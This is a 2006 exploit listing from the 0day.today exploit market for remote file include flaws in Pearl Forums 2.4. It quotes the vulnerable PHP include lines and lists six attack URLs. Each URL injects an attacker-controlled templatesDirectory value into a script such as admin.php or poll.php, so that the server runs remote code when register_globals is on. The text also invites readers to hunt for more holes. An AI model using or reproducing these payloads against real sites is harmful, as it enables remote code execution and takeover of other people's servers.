[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Pearl Forums 2.4 Multiple Remote File Include Vulnerabilities

Author
3l3ctric-Cracker
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-1190
Category
web applications
Date add
21-11-2006
Platform
unsorted
=============================================================
Pearl Forums 2.4 Multiple Remote File Include Vulnerabilities
=============================================================



_____         __  __             __      ___
|  __ \       |  \/  |            \ \    / (_)
| |  | |_ __  | \  / | __ ___  __  \ \  / / _ _ __ _   _ ___
| |  | | '__| | |\/| |/ _` \ \/ /   \ \/ / | | '__| | | / __|
| |__| | |    | |  | | (_| |>  <     \  /  | | |  | |_| \__ \
|_____/|_|    |_|  |_|\__,_/_/\_\     \/   |_|_|   \__,_|___/


/////////////////////////////////////////////////////////////////////////////////////////////////////////////
//Script:Pearl Forums
//Author: Dr Max Virus
//Location:Egypt :)
//Description:The main  Script Of Pearl Products
//Affected Version:2.4
//D
/////////////////////////////////////////////////////////////////////////////////////////////////////////////
//----------------------------------------------------------------------------------

 Bug in
  adressbook.php & admin.php & merge.php &
more than
 u expected files r vulnerable just try to check all files
 Like the Vulnerable Scripts Of Pearl

--------------------------------------------------------------------------------\\

-------------------------------------------------------------------------------
 Vul Codes:
 include_once("$GlobalSettings[templatesDirectory]/addressbook.php");
 include_once("$templatesDirectory/admin.php");

-----------------------------------------------------------------------------------
 Exploits:
 ~~~~~~~~~
 Note that more variables are not sanitized so Exploits can work
Successfuly when
 register_globals=on



code
http://[target]/[path]/includes/admin.php?templatesDirectory-evill code
http://[target]/[path]/includes/password.php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/profile.php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/merge.php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/adminPolls.php?GlobalSettings[templatesDirectory]=evill
code
http://[target]/[path]/includes/poll.php?GlobalSettings[templatesDirectory]=evill
code

    And Many Bug u can discovered just download the script

-----------------------------------------------------------------------------------
    Special Gr33Ts:ASIANEAGLE & Kacper & The Master

////////////////////////////////////////////////////////////////////////////////////



#  0day.today [2024-12-25]  #